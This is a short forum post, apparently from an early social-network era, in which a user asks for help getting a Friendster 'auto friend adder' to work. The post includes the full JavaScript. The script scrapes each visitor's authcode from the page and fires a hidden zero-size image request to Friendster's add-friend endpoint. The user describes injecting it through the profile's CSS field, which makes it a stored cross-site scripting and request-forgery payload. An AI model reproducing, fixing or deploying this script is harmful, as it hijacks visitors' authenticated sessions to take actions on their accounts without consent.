i really confuse about this auto friend adder.
would you tell me how to make it happened?
i put this code into ripway.com:
var afaimg = document.createElement('span');
afaimg.id = "addme";
document.getElementsByTagName('head')[0].appendChild(afaimg);
function afa() {
var eadd = "sorry i erased this email";
var k = document.getElementById("controlPanelButtons").innerHTML;
var a = k.slice(k.indexOf("authcode="));
var m = a.slice(9,39);
document.getElementById("addme").innerHTML = "<img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+m+"&uid="+pageOwnerID+"&email="+eadd+"&firstname=&lastname=&friend=&submit=1\" width=\"0\" height=\"0\" />";
}
if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();};
as a .js file
and then appled it to javascript linker generator:
http://jsesbreno.googlepages.com/Darylldelfin.html
then i put the generated code into my friendster's css field
but it doesnt work!
help me please